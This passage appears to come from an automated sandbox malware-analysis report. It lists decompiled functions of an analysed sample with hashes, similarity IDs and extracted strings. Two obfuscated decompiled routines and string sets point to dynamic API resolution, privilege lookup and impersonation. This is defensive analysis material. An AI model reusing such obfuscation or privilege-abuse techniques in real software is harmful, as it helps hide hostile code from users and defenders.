                                                          • Instruction Fuzzy Hash: 65417975A4530A9FCB00DFB8E894AEE7BB0FF39310F04846AD685E7352E6744949CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B2C1E Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 55%
                                                          			E004B2C1E() {
				long _t32;
				long _t37;
				char* _t38;
				long _t40;
				long _t42;
				char* _t51;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t86;

				 *((intOrPtr*)(_t86 - 0x10)) = 0x3870de;
				_t32 =  *(_t86 - 8);
				_t51 =  *((intOrPtr*)(_t86 - 0x14)) - 0x4fbe;
				 *(_t86 - 8) = _t32;
				if(_t32 >= 0x1e0793) {
					_t32 =  *(_t86 - 0xc);
					 *0x5080d6 =  *0x5080d6 + _t51 - 0x333e5a;
					_t51 = 0x665a;
					if(0x665a <= 0x665a) {
						E00508174 = E00508174 - 0x665a;
					}
					 *0x508192 = 0x665a;
				}
				_t83 = _t82 + _t82;
				 *0x5081d6 =  *0x5081d6 - 0x85cb;
				 *(_t86 - 8) = 1;
				if(1 < 0x2057) {
					if(_t51 != 0x39) {
						_t51 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
					}
				}
				_t65 = 0x674c;
				 *0x5081a6 = 0x674c;
				_t78 = 0x871324;
				_t37 = GetLastError();
				 *0x5081f4 = 0x871324;
				 *(_t86 - 8) = _t37;
				_t38 = "wmi.dll";
				if(_t51 == 0x25f343) {
					_t51 = "LookupPrivilegeValueA";
					_t65 = 0xe16f;
					_t78 =  *0x5081fa; // 0x8a34
				}
				 *0x50afe1 = _t38;
				_t84 = _t83 + 0xc800;
				 *0x50afe5 = 0;
				_t40 =  *(_t86 - 8);
				 *(_t86 - 8) = _t40;
				 *(_t86 - 8) = _t40;
				_t42 =  *(_t86 - 8);
				 *(_t86 - 0x44) = _t42;
				if((_t78 - 0x0000009d & 0x000000a5) == 0) {
					 *0x509dc3 =  *0x509dc3 - _t84;
				}
				 *(_t86 - 8) = _t42;
				E004B009D(_t42, 0, _t65, _t42, _t42, _t42);
				 *((intOrPtr*)(_t86 - 0x10)) =  *((intOrPtr*)(_t86 - 0x10)) + 0x36e765;
				 *(_t86 - 0xc) =  *(_t86 - 0xc) + 0x22a07e;
				 *((intOrPtr*)(_t86 - 0x10)) = 0x36e765;
				 *0x508136 =  *0x508136 + _t65;
				_push(0x4b2ed4);
				goto __ecx;
			}













                                                          0x004b2c26
                                                          0x004b2c3e
                                                          0x004b2c49
                                                          0x004b2c4e
                                                          0x004b2c56
                                                          0x004b2c58
                                                          0x004b2c61
                                                          0x004b2c6a
                                                          0x004b2c6e
                                                          0x004b2c70
                                                          0x004b2c70
                                                          0x004b2c77
                                                          0x004b2c77
                                                          0x004b2c8e
                                                          0x004b2dc8
                                                          0x004b2dd8
                                                          0x004b2ddf
                                                          0x004b2de7
                                                          0x004b2de9
                                                          0x004b2de9
                                                          0x004b2de7
                                                          0x004b2df1
                                                          0x004b2df5
                                                          0x004b2dfe
                                                          0x004b2e07
                                                          0x004b2e0d
                                                          0x004b2e14
                                                          0x004b2e17
                                                          0x004b2e22
                                                          0x004b2e2a
                                                          0x004b2e39
                                                          0x004b2e4c
                                                          0x004b2e4c
                                                          0x004b2e53
                                                          0x004b2e5b
                                                          0x004b2e60
                                                          0x004b2e65
                                                          0x004b2e6a
                                                          0x004b2e6d
                                                          0x004b2e74
                                                          0x004b2e7e
                                                          0x004b2e87
                                                          0x004b2e89
                                                          0x004b2e8f
                                                          0x004b2e91
                                                          0x004b2e97
                                                          0x004b2ea4
                                                          0x004b2eb2
                                                          0x004b2eb5
                                                          0x004b2ebe
                                                          0x004b2ec8
                                                          0x004b2ed2

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$api-ms-win-core-rtlsupport-l1-1-0.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-1352662038
                                                          • Opcode ID: 7d76826fbe4d2e8d0ac3ca8325b30bacd023d218022c18ba4d0e9dfc5a5dfb67
                                                          • Instruction ID: 1a9d487725b299bf176bc5815d09ba955bf3d59fe955111d32ae38c47532a754
                                                          • Opcode Fuzzy Hash: 7d76826fbe4d2e8d0ac3ca8325b30bacd023d218022c18ba4d0e9dfc5a5dfb67
                                                          • Instruction Fuzzy Hash: DA41CE75E003069BCB00DFB8D898AEDBBB1FF28310F00816AD895E7755E7784A46DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004722FE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 108libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00472430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$api-ms-win-core-sysinfo-l1-1-0.dll$wlanmsm.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-1385513556
                                                          • Opcode ID: 243b077be5ff0587b00fa8e6cb81b153b4ae19c2bbcbc70fdb9dc8df7b70dfc4
                                                          • Instruction ID: 150050ec6de9ffcef7b585dbee52c71597650d43a847ccef349c093d59c8f24f
                                                          • Opcode Fuzzy Hash: 243b077be5ff0587b00fa8e6cb81b153b4ae19c2bbcbc70fdb9dc8df7b70dfc4
                                                          • Instruction Fuzzy Hash: 6E418E78A54346DFCB01DFB8ED94AED7BB0EB39310F08816AD884D7762D2780549DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00478389 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 108libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CIRCoInst.dll$credssp.dll$ddrawex.dll$nshhttp.dll$Nqt
                                                          • API String ID: 190572456-4289997220
                                                          • Opcode ID: 1b469da61f081826baf558363e0e863892bc7eddad6ec6e0b3c8986c09ea51c7
                                                          • Instruction ID: 7206b75216fc9e8d6becb0b21179a177ea0e3151b99b8d52cf0857d1718dbf9b
                                                          • Opcode Fuzzy Hash: 1b469da61f081826baf558363e0e863892bc7eddad6ec6e0b3c8986c09ea51c7
                                                          • Instruction Fuzzy Hash: F241A174A54706ABCB00DF78EC94AEDBBB0FF38324B04816AE484E7365EA740549DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047743A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CreateMutexW$\Z $lprmonui.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-556655420
                                                          • Opcode ID: aef21f31fb8b4b0a7be9707394fc250412d53352a0c7401a6b65d82a7fef165c
                                                          • Instruction ID: 544e60698cff5da9509ccf82d4ccbfe7daa20ef13f9bdeecd52e43b83e9a8ce9
                                                          • Opcode Fuzzy Hash: aef21f31fb8b4b0a7be9707394fc250412d53352a0c7401a6b65d82a7fef165c
                                                          • Instruction Fuzzy Hash: 4B314D34A0470ADBCB00DFA9D4D59DDBBB1FB28320F80816AC944E7311E779194ADF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004949F6 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 70libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 21%
                                                          			E004949F6() {
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t20;
				unsigned short _t34;
				unsigned short _t35;
				signed int _t37;
				short _t41;
				intOrPtr _t43;
				void* _t48;
				short _t49;
				void* _t52;

				_t13 =  *(_t52 - 8);
				_t35 = _t34 >> _t34;
				_push( *((intOrPtr*)(_t52 - 0x2c)));
				 *0x50815e = _t35;
				if(_t35 >= _t35) {
					_t35 = 0x5081aa;
					_t41 = _t41 + 1;
					 *0x5081f8 = _t41;
					 *0x50afe3 = _t13;
				}
				_t49 = _t48 + _t48;
				 *(_t52 - 8) = _t13;
				 *0x5080f2 =  *0x5080f2;
				 *((intOrPtr*)(_t52 - 0xc)) = 0x43;
				 *0x508132 = _t35;
				_t37 = _t35 - 0xfffffffffffff03b;
				 *0x5081d0 = _t41;
				_t43 =  *0x508200; // 0x7ac4
				 *0x50afe1 =  *(_t52 - 8);
				_t18 = GetProcAddress( *0x508457, ??);
				 *0x508220 = _t43 + 1;
				 *0x50823a = _t49;
				 *(_t52 - 8) = _t18;
				_t20 =  *(_t52 - 8);
				if(_t18 >= 0x312170 &&  !_t37 >=  !_t37) {
					 *0x5081ec = 0x859f;
					 *0x508270 =  *0x508270 - _t49;
				}
				 *(_t52 - 8) = _t20;
				_push(_t20);
				_push(_t20);
				_push(E00494B11);
				goto __eax;
			}














                                                          0x004949fe
                                                          0x00494a01
                                                          0x00494a04
                                                          0x00494a07
                                                          0x00494a10
                                                          0x00494a12
                                                          0x00494a18
                                                          0x00494a19
                                                          0x00494a2c
                                                          0x00494a2c
                                                          0x00494a32
                                                          0x00494a34
                                                          0x00494a44
                                                          0x00494a5c
                                                          0x00494a69
                                                          0x00494a78
                                                          0x00494a7d
                                                          0x00494a86
                                                          0x00494a8e
                                                          0x00494a9c
                                                          0x00494aa2
                                                          0x00494aa9
                                                          0x00494ab2
                                                          0x00494aba
                                                          0x00494ac3
                                                          0x00494ae1
                                                          0x00494af5
                                                          0x00494afe
                                                          0x00494b00
                                                          0x00494b03
                                                          0x00494b04
                                                          0x00494b05
                                                          0x00494b0f

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00494A9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WSearchMigPlugin.dll$ddrawex.dll$p!1$wmi.dll$Nqt
                                                          • API String ID: 190572456-1434471290
                                                          • Opcode ID: 1b2921f914b72eab74fb7f95c609b86a1c8a99553c2d88909ee7b918e1d1c9e0
                                                          • Instruction ID: 4073f9c71a5283d276482602a1436542289123992978350e6f9d1b410fc3b36a
                                                          • Opcode Fuzzy Hash: 1b2921f914b72eab74fb7f95c609b86a1c8a99553c2d88909ee7b918e1d1c9e0
                                                          • Instruction Fuzzy Hash: 51217879A50A06DFCB01DF78EC94DAD7BB1FF38300B08912AD885D3325EA740949E749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004E3B1D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID: AllocConsole$ddrawex.dll$nshhttp.dll$psxdllsvr.dll$wmi.dll
                                                          • API String ID: 2538663250-1976682281
                                                          • Opcode ID: 88b7c50b5cd9610c0102dbe9056d993bc6a17bf5403cb4d881ad5c00f675bfb5
                                                          • Instruction ID: 478169b490302f1d2c9f35be93f70a0825a486b31e9fba41cad099c8c8b462a3
                                                          • Opcode Fuzzy Hash: 88b7c50b5cd9610c0102dbe9056d993bc6a17bf5403cb4d881ad5c00f675bfb5
                                                          • Instruction Fuzzy Hash: E441D379A10786CFCB01CF79EC886CD7FB1EB7A310B08516AC5819B367D2340649E706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00478AAE Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 270libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$WcnEapAuthProxy.dll$d_=$Nqt
                                                          • API String ID: 190572456-874474735
                                                          • Opcode ID: 739345941ca5f098ae224f1c37f80f69c9a784404871b9e3814e1b80d30c922e
                                                          • Instruction ID: 225a91809ffca486620b264475cb48247e1e9ed6f8563af5068c47f21ab7bdab
                                                          • Opcode Fuzzy Hash: 739345941ca5f098ae224f1c37f80f69c9a784404871b9e3814e1b80d30c922e
                                                          • Instruction Fuzzy Hash: C5A1DFB5A507069FCB00EFB9EC98AED7BB1EF38314F04412ED88897362EA750549D749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048934F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 168libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RtlEthernetStringToAddressW$api-ms-win-core-sysinfo-l1-1-0.dll$wlanmsm.dll$Nqt
                                                          • API String ID: 190572456-922246249
                                                          • Opcode ID: b7135aa9bbf42999368f7364d1fb1f7acee9ce40468ec260462f0fc81de8092d
                                                          • Instruction ID: bb0ae3e416deb5da211429561c45743742c7d8c3d61e61e00bc4544f482bcc45
                                                          • Opcode Fuzzy Hash: b7135aa9bbf42999368f7364d1fb1f7acee9ce40468ec260462f0fc81de8092d
                                                          • Instruction Fuzzy Hash: DE51E2B5F447469FCB01EFB9EC94BEE7BB0EB39310F08442AD94497752E2780949A345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048E14D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0048E2AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 8$CIRCoInst.dll$DismHost.exe$Nqt
                                                          • API String ID: 190572456-888350561
                                                          • Opcode ID: 918e942b95560f9704aacd0a07a1362529585dff6030b0c7d14ea8f06426887f
                                                          • Instruction ID: 602035a3a9da41c2f1d751b1a8513e481c60c518d3e42beaeb75ce24491b831e
                                                          • Opcode Fuzzy Hash: 918e942b95560f9704aacd0a07a1362529585dff6030b0c7d14ea8f06426887f
                                                          • Instruction Fuzzy Hash: 0441E579E403469BC700DF79EC99DEE3F71EB79310B04416AD88593762E7340509E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005009CE Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: D4$charmap.exe$credssp.dll$psxdllsvr.dll
                                                          • API String ID: 3253501508-2777294816
                                                          • Opcode ID: 715e730164055289e3b67c742f1fd6ed5af2c632f8cd4466764f949ed0a7b8a9
                                                          • Instruction ID: 72919a8bd494484e95392ab4e3bc6e3c6be4fad8d5efdec070374de97f78719a
                                                          • Opcode Fuzzy Hash: 715e730164055289e3b67c742f1fd6ed5af2c632f8cd4466764f949ed0a7b8a9
                                                          • Instruction Fuzzy Hash: D641E26AA517828FD700DF38EC59BDE3BA1FB39320F04513A9884973E6E6340549E716
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00496952 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00496AB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RRj$credssp.dll$we$$Nqt
                                                          • API String ID: 190572456-913505113
                                                          • Opcode ID: 4e331f677e604bb74d3fae4c08fe561d665efc0bb5772b8bc61e89857c9739e0
                                                          • Instruction ID: 5a1c6126462f4114fa398f23f2637442c3c60eaa7f0335204d1d519aee26fa92
                                                          • Opcode Fuzzy Hash: 4e331f677e604bb74d3fae4c08fe561d665efc0bb5772b8bc61e89857c9739e0
                                                          • Instruction Fuzzy Hash: 6B41CEB8E403469FCF01DFB8D8909EE7FB0EB2A310B54806BD885E7312E2354889DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00492956 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: LookupPrivilegeValueA$RtlEthernetStringToAddressW$lyncicon.exe$Nqt
                                                          • API String ID: 190572456-539634128
                                                          • Opcode ID: 0a66d9b77f67b3e1e7e6c8de2e227a9fa6421284eb2227568f1f5e9011ff0a82
                                                          • Instruction ID: 0c1c058608777a9dd9a35f90b2e0f8d97da906d8e7c0a5cf814c7b10f7af18a6
                                                          • Opcode Fuzzy Hash: 0a66d9b77f67b3e1e7e6c8de2e227a9fa6421284eb2227568f1f5e9011ff0a82
                                                          • Instruction Fuzzy Hash: B9319DB9A503829FCB00DFB9EC909EC7BB1FB35300B48416E9885D7325E6B40549EB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004CD6D7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 80registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,00000000), ref: 004CD7D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID: BuildExplicitAccessWithNameA$WcnEapAuthProxy.dll$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll
                                                          • API String ID: 2289755597-3938352633
                                                          • Opcode ID: 1537c05db238c747134345ac1831970058689b8ce613353b545c93a17f2a07aa
                                                          • Instruction ID: 6bc98170748adfc2114eeaf668935e25c23d1e48ee6c7c51a2ab72bdaf217201
                                                          • Opcode Fuzzy Hash: 1537c05db238c747134345ac1831970058689b8ce613353b545c93a17f2a07aa
                                                          • Instruction Fuzzy Hash: 3E318C79E40606AFCB00DFA8D894ADD7BB0FF39300F044429E485E7361E3355A89D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A08AF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,00000001), ref: 004A08FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RemoveVectoredExceptionHandler$SystemPropertiesComputerName.exe$h($Nqt
                                                          • API String ID: 190572456-2048438507
                                                          • Opcode ID: 46d6d47958950fc958fc1f4f71b6f233b46f5012f795e53625c05ce06352dd2d
                                                          • Instruction ID: 4368c4ccae275847e7ebbbdb1e404c695e6d0dbd48467e48243be78c9e44eb04
                                                          • Opcode Fuzzy Hash: 46d6d47958950fc958fc1f4f71b6f233b46f5012f795e53625c05ce06352dd2d
                                                          • Instruction Fuzzy Hash: 9221F2B5A143069FDB00EFB8D895BDC3BF1FB3A324F0040AAD58997752D63909059745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A1238 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$Sr0$diskperf.exe$Nqt
                                                          • API String ID: 190572456-1598637452
                                                          • Opcode ID: dee11cccfd1529b4d2f9c8bdad33cc9df83b9d379c079f57a01fdd710746f205
                                                          • Instruction ID: 07ef9dae4a3c871b0ce8ae70ee245d1878aab7bce912faf4b626f864288f0a72
                                                          • Opcode Fuzzy Hash: dee11cccfd1529b4d2f9c8bdad33cc9df83b9d379c079f57a01fdd710746f205
                                                          • Instruction Fuzzy Hash: 6921A4B5A00345CFDB00DFB8E854AED3BB2EF3A310B44816AC885D7776E675494AD345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046EBEA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0046ED3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: wmi.dll$Nqt$t7
                                                          • API String ID: 190572456-2631463486
                                                          • Opcode ID: 2886ff682793c37c36f2dec8d442e1c1fcc95b995a71499e0460dfafb6186149
                                                          • Instruction ID: 837f40a6ddf4115bac9c86d48001a0ff3b49e93b50f263334a12337154d90e77
                                                          • Opcode Fuzzy Hash: 2886ff682793c37c36f2dec8d442e1c1fcc95b995a71499e0460dfafb6186149
                                                          • Instruction Fuzzy Hash: 2C41BD78E542069FCB00DFAAE8946DDBFF1FB38310F4480BA8585E7365E679054ADB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00474A46 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00474B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RtlImpersonateSelfEx$ddrawex.dll$Nqt
                                                          • API String ID: 190572456-1780917239
                                                          • Opcode ID: 65a843699a4b0d38477fed0e65f015b79473080197e8d48dba81ee7f5a24ee50
                                                          • Instruction ID: 4ae5830ff229aef22553f9deefcf4175960be1eecb69cfad7f91f2d2be5c65ef
                                                          • Opcode Fuzzy Hash: 65a843699a4b0d38477fed0e65f015b79473080197e8d48dba81ee7f5a24ee50
                                                          • Instruction Fuzzy Hash: AB418C76A10706DBCB00DFB9E8949EDBBB1FF38310B00816AC98593721E7750A4AEB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C014E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: EtwEventWriteStartScenario$K"$charmap.exe
                                                          • API String ID: 4139908857-3254226376
                                                          • Opcode ID: 40c8f62f6087819b411a221b0b83d3b6d427bd984bc7250810d83f0aa37d90f2
                                                          • Instruction ID: 6f3de5ccae825d4e8561d9fa151f0ceb1499750b399ab9ae65ecb8d6e0394d4d
                                                          • Opcode Fuzzy Hash: 40c8f62f6087819b411a221b0b83d3b6d427bd984bc7250810d83f0aa37d90f2
                                                          • Instruction Fuzzy Hash: 5C31E069A04382CFCB00DFB8EC48EED3FB1EB3A310B04406AC885D7B66E6340449E716
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A41AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A42B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ddrawex.dll$Nqt
                                                          • API String ID: 190572456-494668020
                                                          • Opcode ID: 569bc4023d1a5c79054b1a62b707c896296703f84d1f5819f8cf8f6fd2ac9ddb
                                                          • Instruction ID: 3651d54df87e2428eab709647290cda3b38f23c502e353017288bad7ddd6208b
                                                          • Opcode Fuzzy Hash: 569bc4023d1a5c79054b1a62b707c896296703f84d1f5819f8cf8f6fd2ac9ddb
                                                          • Instruction Fuzzy Hash: 1D31247A9402069BDB00DF75DC95AED7BB1FF7A310F04416AE89093311D3B9094ADB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047A989 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: api-ms-win-core-sysinfo-l1-1-0.dll$Nqt
                                                          • API String ID: 190572456-1420055301
                                                          • Opcode ID: 4fdc0f3b35a19ab07590cad4387887ffbced67ca9604701b3197bb38c285968b
                                                          • Instruction ID: 16024d2c18d38f20404b8fea170110ef5a0689291bfc1e0e3548704d20fab459
                                                          • Opcode Fuzzy Hash: 4fdc0f3b35a19ab07590cad4387887ffbced67ca9604701b3197bb38c285968b
                                                          • Instruction Fuzzy Hash: 4A113A75A51B459BCB00DF68D9908EC7BB1FF39300F1081BAD989D7321E774099ADB0A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047CA75 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
